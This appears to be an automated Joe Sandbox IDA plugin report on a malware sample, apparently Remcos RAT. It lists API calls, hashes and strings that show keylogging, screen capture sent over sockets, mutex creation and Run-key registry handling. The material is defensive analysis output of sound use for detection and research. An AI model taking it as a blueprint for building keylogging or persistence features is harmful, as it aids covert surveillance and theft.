                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: 8ad9b4a9319c0ce8e08ab0eef02bf2d7836f92b3666c7b1e2c0131a55ef00c42
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 8ad9b4a9319c0ce8e08ab0eef02bf2d7836f92b3666c7b1e2c0131a55ef00c42
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                • String ID: XQG
                                • API String ID: 4068920109-3606453820
                                • Opcode ID: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: 21aa211e1a7797fa89a1b10c2aaeaa18a9433730dc686852439f38efa4a59002
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: 21aa211e1a7797fa89a1b10c2aaeaa18a9433730dc686852439f38efa4a59002
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 4ca78bee1b29c2b2eaf028355388d4b479c826490612efa5b39e4efab7956beb
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 4ca78bee1b29c2b2eaf028355388d4b479c826490612efa5b39e4efab7956beb
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
                                • Opcode ID: 83e50ac4dae1b8c5f58466140d22aecb7b5797b4a98a9f2a00060ccb3113e507
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: 83e50ac4dae1b8c5f58466140d22aecb7b5797b4a98a9f2a00060ccb3113e507
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137A6
                                • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.3 Pro), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: hdF$pth_unenc
                                • API String ID: 3325800564-514923600
                                • Opcode ID: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: a0279363c5a25902ec7a11d25b89e924bfdaaad508c09a6524f83826895f7699
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: pth_unenc
                                • API String ID: 3123878439-4028850238
                                • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                • String ID:
                                • API String ID: 2579639479-0
                                • Opcode ID: ceb3114af3113f3e51a28b58c6f931136764174e6725d3240f6aeee7034d4dad
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: ceb3114af3113f3e51a28b58c6f931136764174e6725d3240f6aeee7034d4dad
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GdiplusStartup.GDIPLUS(po,?,00000000,00000000), ref: 004187BF
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GdiplusStartupconnectsend
                                • String ID: NG$po
                                • API String ID: 1957403310-3896224581
                                • Opcode ID: 673274db020c139a2ecc853ca900501f0aefbfd7540e00b3ec92785fef0916f7
                                • Instruction ID: 7327f59b566e15a660d60aa82690027a46463592f46d402a66a7ce129b2a3f3c
                                • Opcode Fuzzy Hash: 673274db020c139a2ecc853ca900501f0aefbfd7540e00b3ec92785fef0916f7
                                • Instruction Fuzzy Hash: 7641A2717042015BC208FB22D952ABEB396ABC0358F50453FF54A672D2EF7C5D4A869E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                • Opcode ID: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                • Opcode Fuzzy Hash: d9a19672ec4dc75711255ce94c2c2311e4e29857de9186f34d814f6d2a4cbe43
                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,Pj,004752F0,?,pth_unenc), ref: 00413A31
                                • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00413A45
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: Rmc-4QQORA
                                • API String ID: 1925916568-418441438
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventObjectSingleWaitsend
                                • String ID:
                                • API String ID: 3963590051-0
                                • Opcode ID: 778a05176575217d70e804aa02ba2bb4ca6cce75f32be32a141a68c09f8a03c8
                                • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                • Opcode Fuzzy Hash: 778a05176575217d70e804aa02ba2bb4ca6cce75f32be32a141a68c09f8a03c8
                                • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • RegCloseKey.KERNEL32(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                • RegCloseKey.KERNEL32(?), ref: 00413592
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
